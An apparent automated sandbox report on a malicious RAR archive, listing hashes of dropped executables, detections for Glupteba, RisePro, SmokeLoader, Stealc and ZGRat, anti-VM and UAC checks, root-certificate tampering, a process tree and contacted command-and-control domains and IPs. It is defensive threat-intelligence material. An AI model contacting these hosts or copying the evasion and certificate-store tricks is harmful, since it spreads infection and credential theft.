SHA1 e9f852be4417a12f094f6cce7b76621878193ef4
SHA256 948c3a09c098e33324a0ddcaa71ef3f5501c80fbc6d5225e8ea29efe124f2719
SHA512 6dbfbcc7b31451312e21dcc8f7873490b60adc4e545da05375b89c54e385c59c6f2c4cbf87229c4e7f3233dab4bbe1a91e1fbe507c566a444d6ad2f390bef470

C:\Users\Admin\Documents\GuardFox\PRPSLOJESuJHQLjldDsEWa5D.exe

MD5 a2cd0ee55ac61c65ad6d4be2ef602c18
SHA1 d96591ad585284c13d277d578851ab6293d44310
SHA256 b68e8b42419bc60ff72822495bf99175506668091a58fbd1d11747e039192be7
SHA512 bfee5ab8e75ad1edd98a13bf456da9ccead22c40a518ceacf90f259026cdfc938b7da6003bc4fb79e22720b46d74b308b76fda65f638217af4148984f2aa97ec

C:\Users\Admin\Documents\GuardFox\T83K0fj1RPNZcK5ce9BGYbEr.exe

MD5 2117899a2ae435139133075f560e2ae2
SHA1 17e212a4d9e9029cd65493ce4512df152f0f52da
SHA256 6c06f528548ea45c6080a37373ce9051592998b0943ddea3e41f020be225d6af
SHA512 7252bbad94df230a8a761a93d16cfadbe5ffe5c15b6bf0abefe86161b11458f729aa01eb94fec6ee6f28ea2e3032f573286ead7748e4f4640c9dd1938c158ff5

C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe

MD5 8589e1a03503c53d3834f0a101cfdebf
SHA1 18e4a8dcf25ea22186afad558c9be2b4c12ae0ce
SHA256 4b3d11d2be51bd4f0426f30e6ca7ea58196d395ae69acd96c2bbe3f70f895ad7
SHA512 d91c8332b6025516b2916ef0c4ae64a547ed57562a0d916ccae4e0ec027b0e6162421634147d58c8713de5b50ced1af2fcf49a5d325459cccf76062cd2073704

C:\Users\Admin\Documents\GuardFox\Ipjb8_Ct3Bu5_uNThO5sOupY.exe

MD5 cadf3a652abcf29e5696a961f0c8722c
SHA1 8a8f03874a314e11cc8463a068934357ce37c1a3
SHA256 b1aa828f1cca97ee2d691473bd37acc92f89b0bc971020b836aaa432ebeb9f5c
SHA512 08628dcf11ce9f3a3cf2ee7b48679b08ed6563bb13e657cf2dae932cd104cc4b1a21b233626998195f7663660f9f04f485a0064e179a09488d67f8e0f7e7e0db

C:\Users\Admin\Documents\GuardFox\griZbGlDTQ2Gp9lRWbcAmGPV.exe

MD5 d8666ba0b58b3d01ff7ebc4af4d85bbc
SHA1 bdf372e47c847132b28cdd123851b7852dd0c73e
SHA256 d50b970e3d61822619b1daf789d92859003316fe97be69c3f372902b700a461e
SHA512 de46227f7c8d69347ec3e63ac4fb730ce4b95730155549586dcd67b86bed2124eb083e74645cc38fbd48d8fec6a964d9a69be3282973bef35b923a4a33fd133f

C:\Users\Admin\Documents\GuardFox\WbpOVj2wdHtADLlWkCQJXyxg.exe

MD5 4dfbb07f824d4f1106cc7fba9cbcfeb0
SHA1 f225ce68bc6dbcaed82aff71d96315f692c947d4
SHA256 03097d72e93fc715793b38011623e2d8d4f98caabb082c6c80a53f27da95a10d
SHA512 700da5bcf66429ee440864421588692344078274940e4179c958479c63471f415da181397231ad9ad6033f641cc3a1cb6075c3461f00e173197281e65c5f0dfe

C:\Users\Admin\Documents\GuardFox\FfTdssBgUOeUFS8ACw1xXwQq.exe

MD5 4df6b172665dfb39cd972b1ea2fd663b
SHA1 1a470b00871154f2c1b52df6c134758230480661
SHA256 8447700d10f668efa15aba5b02e0a3d031d94a2be170a166d009a3f2cc0f7408
SHA512 52fa2b79cb4cb746c1958a2499c08e41febf4fef5bf1a92a88f61cbb5416abfd2c7e8b7b72a72fda955e9e4eb66bad3ff09788fdca402d2baaaee8f0dfd0fca2

C:\Users\Admin\Documents\GuardFox\Oo3P2P2VOFHTfbT2AUs5ehOf.exe

MD5 768351e7fb4e73a68d6128a4ab7ccc4e
SHA1 b2e42ae8d8f154800c6ade37ad6ce4e903da79de
SHA256 e1af5fed9e816a4f21c4f25e8d1388d8e8deac07c9cacd2889b749f2ec28a396
SHA512 76f96b1e6d962937822c05814c77ac8903ac612db07d8daa7ddb2fb7443e6151afc880daf5a8a3e42b4f3e8dc081f391cab3e8098fb4af8ac31ef81a66d20941

Analysis: behavioral1

Detonation Overview

Submitted 2024-02-23 17:45

Reported 2024-02-23 17:49

Platform win7-20240221-en

Max time kernel 51s

Max time network 213s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\file_release_4.rar

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RisePro

stealer risepro

SmokeLoader

trojan backdoor smokeloader

Stealc

stealer stealc

ZGRat

rat zgrat

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\7zO86AF41E6\setup.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\7zO86A9AAC6\setup.exe N/A

Downloads MZ/PE file

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zO86AF41E6\setup.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\7zO86AF41E6\setup.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zO86A9AAC6\setup.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\7zO86A9AAC6\setup.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A

Reads user/profile data of web browsers

spyware stealer

Checks whether UAC is enabled

evasion trojan

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\7zO86AF41E6\setup.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\7zO86A9AAC6\setup.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A api.myip.com N/A N/A
N/A api.myip.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\GroupPolicy C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe N/A
File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO86AF41E6\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO86A9AAC6\setup.exe N/A

Enumerates physical storage devices

Modifies system certificate store

evasion spyware trojan

Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = [certificate blob omitted] C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = (certificate blob omitted) C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = (certificate blob omitted) C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\file_release_4.rar

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\file_release_4.rar"

C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe

"C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe"

C:\Users\Admin\AppData\Local\Temp\7zO86AF41E6\setup.exe

"C:\Users\Admin\AppData\Local\Temp\7zO86AF41E6\setup.exe"

C:\Users\Admin\AppData\Local\Temp\7zO86A9AAC6\setup.exe

"C:\Users\Admin\AppData\Local\Temp\7zO86A9AAC6\setup.exe"

C:\Users\Admin\Documents\GuardFox\1AGsAM7Y26Vr36pGSHA98hbO.exe

"C:\Users\Admin\Documents\GuardFox\1AGsAM7Y26Vr36pGSHA98hbO.exe"

C:\Users\Admin\Documents\GuardFox\A5CmtvxmOSm25U_v2W3gT72J.exe

"C:\Users\Admin\Documents\GuardFox\A5CmtvxmOSm25U_v2W3gT72J.exe"

C:\Users\Admin\Documents\GuardFox\RfHaLGAD1f_KWSrCQe5tWOzu.exe

"C:\Users\Admin\Documents\GuardFox\RfHaLGAD1f_KWSrCQe5tWOzu.exe"

C:\Users\Admin\Documents\GuardFox\1eXwW8W0LQr4lKFVVhJkmQ9O.exe

"C:\Users\Admin\Documents\GuardFox\1eXwW8W0LQr4lKFVVhJkmQ9O.exe"

C:\Users\Admin\Documents\GuardFox\_WmA4UeHN2lS8kJMKSI_Okk5.exe

"C:\Users\Admin\Documents\GuardFox\_WmA4UeHN2lS8kJMKSI_Okk5.exe"

C:\Users\Admin\Documents\GuardFox\grJJOXisL53B7lk88iWMuUJd.exe

"C:\Users\Admin\Documents\GuardFox\grJJOXisL53B7lk88iWMuUJd.exe"

C:\Users\Admin\Documents\GuardFox\uK5XIHQ709h40q_3RXOWxPKt.exe

"C:\Users\Admin\Documents\GuardFox\uK5XIHQ709h40q_3RXOWxPKt.exe"

C:\Users\Admin\Documents\GuardFox\FAQhhDdJvDUvJ7Gg2HOVMW2l.exe

"C:\Users\Admin\Documents\GuardFox\FAQhhDdJvDUvJ7Gg2HOVMW2l.exe"

C:\Users\Admin\Documents\GuardFox\hHz8UvhmNqdNyZGgBI24N_af.exe

"C:\Users\Admin\Documents\GuardFox\hHz8UvhmNqdNyZGgBI24N_af.exe"

C:\Users\Admin\Documents\GuardFox\KJFWzmdhqKqcO1aK2C0lM0oL.exe

"C:\Users\Admin\Documents\GuardFox\KJFWzmdhqKqcO1aK2C0lM0oL.exe"

C:\Users\Admin\AppData\Local\Temp\is-7G3C8.tmp\1AGsAM7Y26Vr36pGSHA98hbO.tmp

"C:\Users\Admin\AppData\Local\Temp\is-7G3C8.tmp\1AGsAM7Y26Vr36pGSHA98hbO.tmp" /SL5="$40186,4124890,54272,C:\Users\Admin\Documents\GuardFox\1AGsAM7Y26Vr36pGSHA98hbO.exe"

C:\Users\Admin\AppData\Local\Temp\7zSE7A1.tmp\Install.exe

.\Install.exe

C:\Users\Admin\AppData\Local\Temp\7zS75AD.tmp\Install.exe

.\Install.exe /MFFdidt "525403" /S

C:\Users\Admin\AppData\Local\Temp\FF07.exe

C:\Users\Admin\AppData\Local\Temp\FF07.exe

C:\Users\Admin\AppData\Local\Temp\FF07.exe

C:\Users\Admin\AppData\Local\Temp\FF07.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct

Network

Country Destination Domain Proto
DE 77.105.147.130:80 77.105.147.130 tcp
US 8.8.8.8:53 api.myip.com udp
US 172.67.75.163:443 api.myip.com tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.186.192:443 ipinfo.io tcp
US 34.117.186.192:443 ipinfo.io tcp
DE 77.105.147.130:80 77.105.147.130 tcp
US 8.8.8.8:53 triedchicken.net udp
US 8.8.8.8:53 monoblocked.com udp
US 8.8.8.8:53 vk.com udp
US 8.8.8.8:53 cczhk.com udp
US 8.8.8.8:53 acenitive.shop udp
US 8.8.8.8:53 294down-river.sbs udp
US 8.8.8.8:53 medfioytrkdkcodlskeej.net udp
US 8.8.8.8:53 cleued.com udp
US 8.8.8.8:53 def.bestsup.su udp
RU 147.45.47.101:80 147.45.47.101 tcp
DE 185.172.128.127:80 185.172.128.127 tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
AR 190.224.203.37:80 cczhk.com tcp
US 172.67.171.112:80 def.bestsup.su tcp
RU 91.215.85.209:80 medfioytrkdkcodlskeej.net tcp
US 172.67.180.119:80 triedchicken.net tcp
US 104.21.69.242:80 acenitive.shop tcp
US 104.21.69.242:80 acenitive.shop tcp
US 104.21.4.60:80 cleued.com tcp
US 104.21.67.206:80 294down-river.sbs tcp
RU 45.130.41.108:80 monoblocked.com tcp
US 104.21.69.242:80 acenitive.shop tcp
US 172.67.180.119:80 triedchicken.net tcp
US 104.21.69.242:80 acenitive.shop tcp
US 104.21.4.60:80 cleued.com tcp
US 104.21.67.206:443 294down-river.sbs tcp
RU 91.215.85.209:80 medfioytrkdkcodlskeej.net tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 45.130.41.108:80 monoblocked.com tcp
US 172.67.180.119:80 triedchicken.net tcp
US 104.21.69.242:80 acenitive.shop tcp
US 104.21.4.60:80 cleued.com tcp
US 104.21.69.242:80 acenitive.shop tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 45.130.41.108:80 monoblocked.com tcp
RU 91.215.85.209:80 medfioytrkdkcodlskeej.net tcp
US 172.67.180.119:80 triedchicken.net tcp
US 104.21.69.242:80 acenitive.shop tcp
US 104.21.69.242:80 acenitive.shop tcp
US 104.21.4.60:80 cleued.com tcp
US 172.67.180.119:443 triedchicken.net tcp
US 104.21.69.242:443 acenitive.shop tcp
US 104.21.69.242:443 acenitive.shop tcp
US 104.21.4.60:443 cleued.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 91.215.85.209:80 medfioytrkdkcodlskeej.net tcp
RU 45.130.41.108:80 monoblocked.com tcp
AR 190.224.203.37:80 cczhk.com tcp
RU 91.215.85.209:443 medfioytrkdkcodlskeej.net tcp
RU 45.130.41.108:443 monoblocked.com tcp
US 8.8.8.8:53 apps.identrust.com udp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
GB 96.17.179.184:80 apps.identrust.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
US 8.8.8.8:53 pergor.com udp
US 172.67.156.81:443 pergor.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
US 8.8.8.8:53 x2.c.lencr.org udp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
GB 2.19.169.32:80 x2.c.lencr.org tcp
US 8.8.8.8:53 carthewasher.net udp
US 188.114.97.2:443 carthewasher.net tcp
US 8.8.8.8:53 632432.site udp
NL 194.104.136.64:443 632432.site tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:443 vk.com tcp
RU 87.240.132.78:443 vk.com tcp
RU 87.240.132.78:443 vk.com tcp
RU 87.240.132.78:443 vk.com tcp
RU 87.240.132.78:443 vk.com tcp
RU 87.240.132.78:443 vk.com tcp
RU 87.240.132.78:443 vk.com tcp
RU 87.240.132.78:443 vk.com tcp
RU 87.240.132.78:443 vk.com tcp
RU 87.240.132.78:443 vk.com tcp
DE 77.105.147.130:80 77.105.147.130 tcp
US 8.8.8.8:53 iplis.ru udp
US 172.67.147.32:443 iplis.ru tcp
US 8.8.8.8:53 iplogger.org udp
US 104.21.4.208:443 iplogger.org tcp
US 8.8.8.8:53 selebration17io.io udp
RU 91.215.85.120:80 selebration17io.io tcp
DE 185.172.128.24:80 185.172.128.24 tcp
DE 194.55.13.50:9001 tcp
CA 162.250.191.15:9001 tcp
GB 81.0.248.210:443 tcp
GB 81.0.248.210:443 tcp
CA 162.250.191.15:9001 tcp

Files

\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe

MD5 75f610245174c2efde63e6151866540b
SHA1 2b18891ce43a5a3f57139d81a35f9003f81a8a05
SHA256 33c629c21254714bb3f9e6dc7e07946834d8d6bf2d017aeadaa3f597a3c7d21e
SHA512 4ca7f3f424e521877f0afe7ff66db5574f5c9685941f5af879acec3bbf7f7012529f68a6283d2444eb4c2fca4edfc4781d67371a95756894ba4f728873a3aac7

C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe

MD5 bf5915897ae58b6e618fe1de3cdcdb17
SHA1 889072f7b9091692038249d82a71873c292bfb7a
SHA256 263da0ae0123cc731b43ea3c0cc6f353b0f58f03bff230243e860e6f80a6f904
SHA512 4d5b68e9254aa91c58f54046c3f58bfa6260bf13c89da72c19601408158939591908f6172f6c7d70b8e624d330d73a563dc3af8e6f48e09f42a423f2c0bfc4aa

memory/2664-32-0x0000000140000000-0x0000000140B9C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe

MD5 2bb083dc1d1d8af5b21514127d8e534c
SHA1 89dead2c592e2c858e4b4e1cdb3760ee1d7baddf
SHA256 a4f0ae096faccc3b611abceaca562d0b067b0cc0181c00deabc36704eaac4b79
SHA512 cc4ca76b3cf2336c5ece29a1a946465d68f85cb001f59a7835629be08cc8674347123e3392de434c7fda8fee262e64f5d09fbe5f21cc61272e561fa5c657014d

memory/2640-33-0x0000000140000000-0x0000000140B9C000-memory.dmp

memory/2640-34-0x0000000140000000-0x0000000140B9C000-memory.dmp

memory/2640-35-0x000007FEFD5C0000-0x000007FEFD62C000-memory.dmp

memory/2640-36-0x00000000002E0000-0x00000000002E1000-memory.dmp

memory/2640-37-0x000007FE80010000-0x000007FE80011000-memory.dmp

memory/2640-39-0x0000000077640000-0x00000000777E9000-memory.dmp

memory/2640-38-0x0000000140000000-0x0000000140B9C000-memory.dmp

memory/2640-41-0x0000000140000000-0x0000000140B9C000-memory.dmp

memory/2640-40-0x0000000140000000-0x0000000140B9C000-memory.dmp

memory/2640-43-0x0000000140000000-0x0000000140B9C000-memory.dmp

memory/2640-44-0x0000000140000000-0x0000000140B9C000-memory.dmp

memory/2640-42-0x0000000140000000-0x0000000140B9C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab94E2.tmp

MD5 ac0e1346426666541627a9a2f8e72846
SHA1 07db3d7686d9c899a68177e4914b9a7462adf1b9
SHA256 cd4c70f5892582960f985ac0c6569878589d07ded283c617f21d5996300e01b1
SHA512 67286571db030a87789f1dff4cab9d203af05223b479499bce94efb248bc43eb5b08f6028f5cf35042489766a9a6ea93caeeb40dcee3e8b4bda1aa02ed538c42

C:\Users\Admin\AppData\Local\Temp\Tar9504.tmp

MD5 0a672ba941d9814ccaed6b48151d778e
SHA1 2b26d7228d0985d466723cc9cfb2c2fab0c6fd86
SHA256 fbfa82d0d7b086b2f680d3bb4660c8f6dcbc7544710a633477fbd69575199825
SHA512 b565aba98125c9c444cfdf0e73df0eb297ee334f2e799cc62b2ba860b967acfb3fb0e5270aa28724a9660e93b5013f959bd0dbfd9547598e7804eadfaa43f51c

C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe

MD5 9dd56a34985e6829d4ed94e10ad1064a
SHA1 b0f5c7415c298b1800dd36ef437dd2de87b9a17b
SHA256 53bd9c18cab7bcc98e5e0bc22a7ea0f55b258f12d55b56aa147808982605d3d4
SHA512 f3ceb16e164ebe36f7fd619136b8e1cdbbc034507f7cc914fc12b33cda60cf4016cd35d28ab18b496e530252cfca0a27667481a54a1a632a5907c79707b4dd3f

memory/2640-87-0x0000000140000000-0x0000000140B9C000-memory.dmp

memory/2664-88-0x0000000140000000-0x0000000140B9C000-memory.dmp

memory/2640-93-0x0000000140000000-0x0000000140B9C000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zO86AF41E6\setup.exe

MD5 b27008cc829387439a9a31fe652d8cce
SHA1 56b3072604a5ba570ed526697b5807ea8475a3b5
SHA256 87890125269c772b583fb626b8824f20d0d348a2a2694e5a7aa21d9b59d567de
SHA512 cfb89be99c1674b5a7d0830da8e38d8af63a1f5fd7e36be7ad953a19379b1821487954e5a3d950967da33588446e48e02c5ac2c2d6b1977e17ca68f052f89547

memory/2664-95-0x0000000140000000-0x0000000140B9C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zO86AF41E6\setup.exe

MD5 98c7bd8444b2dc1c1093a00310f7cd02
SHA1 235b76bbe5586208f18d132d4a973111d81b2de2
SHA256 05b173bd4b8fcbe0b1ca42b1eda61fb160ff3ef09e416b9994ecb9d54e7081de
SHA512 65855a690b8b365a015ae20927159b1682a695a8cbe73cfae3b8fd295d709373b3049d9216b63248b731eadfb958a8b0f18aaf81004933f52c52d5d72256ec62

memory/2612-99-0x0000000140000000-0x0000000140B9C000-memory.dmp

memory/2612-119-0x0000000077640000-0x00000000777E9000-memory.dmp

memory/2612-117-0x000007FEFD5C0000-0x000007FEFD62C000-memory.dmp

memory/2612-115-0x0000000000180000-0x0000000000181000-memory.dmp

memory/2612-114-0x0000000140000000-0x0000000140B9C000-memory.dmp

memory/2612-113-0x0000000140000000-0x0000000140B9C000-memory.dmp

memory/2612-112-0x0000000140000000-0x0000000140B9C000-memory.dmp

memory/2612-111-0x0000000140000000-0x0000000140B9C000-memory.dmp

memory/2612-110-0x0000000140000000-0x0000000140B9C000-memory.dmp

memory/2612-109-0x0000000140000000-0x0000000140B9C000-memory.dmp

memory/2612-108-0x0000000077640000-0x00000000777E9000-memory.dmp

memory/2612-107-0x000007FEFD5C0000-0x000007FEFD62C000-memory.dmp

memory/2640-106-0x0000000140000000-0x0000000140B9C000-memory.dmp

memory/2612-105-0x000007FEFD5C0000-0x000007FEFD62C000-memory.dmp

memory/2612-104-0x000007FEFD5C0000-0x000007FEFD62C000-memory.dmp

memory/2640-103-0x0000000077640000-0x00000000777E9000-memory.dmp

memory/2640-102-0x000007FEFD5C0000-0x000007FEFD62C000-memory.dmp

memory/2664-122-0x0000000140000000-0x0000000140B9C000-memory.dmp

memory/2612-101-0x0000000140000000-0x0000000140B9C000-memory.dmp

memory/2640-100-0x000007FEFD5C0000-0x000007FEFD62C000-memory.dmp

memory/516-141-0x000007FEFD5C0000-0x000007FEFD62C000-memory.dmp

memory/516-143-0x0000000077640000-0x00000000777E9000-memory.dmp

memory/516-140-0x0000000140000000-0x0000000140B9C000-memory.dmp

memory/516-139-0x0000000140000000-0x0000000140B9C000-memory.dmp

memory/516-138-0x0000000140000000-0x0000000140B9C000-memory.dmp

memory/516-137-0x0000000140000000-0x0000000140B9C000-memory.dmp

memory/516-136-0x0000000140000000-0x0000000140B9C000-memory.dmp

memory/516-135-0x0000000140000000-0x0000000140B9C000-memory.dmp

memory/516-134-0x0000000077640000-0x00000000777E9000-memory.dmp

memory/516-133-0x00000000002E0000-0x00000000002E1000-memory.dmp

memory/516-132-0x000007FEFD5C0000-0x000007FEFD62C000-memory.dmp

memory/516-131-0x000007FEFD5C0000-0x000007FEFD62C000-memory.dmp

memory/516-130-0x000007FEFD5C0000-0x000007FEFD62C000-memory.dmp

memory/516-129-0x0000000140000000-0x0000000140B9C000-memory.dmp

C:\Users\Admin\Documents\GuardFox\grJJOXisL53B7lk88iWMuUJd.exe

MD5 8da141798355a55ad27df92697fe588c
SHA1 939db17578c2386797211fa64c5271f8daa35e84
SHA256 080e824dae48fd8d3df2bcfe97b192b8f19e42a0f2ea59cac43ee4b9cd7968b6
SHA512 0440fa9b74ba23dac7b20264fb880264486d52a6923a3c803968a3c9c0165a6a455a86f03f4b4164feba974b361488eb5cf953f0f2804fdf5f72c8956bbaaacb

\Users\Admin\AppData\Local\Temp\7zO86A9AAC6\setup.exe

MD5 5a6fb4b50ae846671e50dbd1d7456b61
SHA1 a19ded3d5a871fefa5467ad20ec00f03f6f1f7de
SHA256 e4d3d0485a81d90e5d42a746eb10efeb9e334cad655934f2c8cef0cce6f6325b
SHA512 716910881be65657b36c2f2b9e115e59f78c6915bb4045d2f468f02daa670f6001c2f06356bc18cfdcd2bdb67a086090f5a3de453ac89afefdf69dc8ff0ab5ef

C:\Users\Admin\Documents\GuardFox\1AGsAM7Y26Vr36pGSHA98hbO.exe

MD5 d1b21c8e8c40ae3ab35205f7e3238dea
SHA1 fc37a57743112bf4dd73eac4b4d8ea1ccab800fb
SHA256 ed4ea1c0a68528c4d166d97b32b23494a8c15e520f12f7674e8e15d394ad7abc
SHA512 2043b13296d353be90dfd981f2812d8bb63debfad4d7070964eae2a3bb0edeb3ad0103882501764817c006575bfcfdc6ce158c716a6a934aa04d4716733227e0

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 52c5f8af28f31a0c44f05d3a4f65b2a1
SHA1 c57218786366dd9052d1ffa27f0e56505c13af7f
SHA256 3225d32d6877ad9415162ecc38f79ed3b0347fd35087452e18d8264b80f73985
SHA512 686bd7ba8e16e9b570700f90c3995b77df7db641366587e5aee0819f8ef679342c0fc80792cf890b4f34f4f6ccf3d5b194a087ed29c549648789e000f095fd05

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 b9e0495461019e506cc9426b3f164916
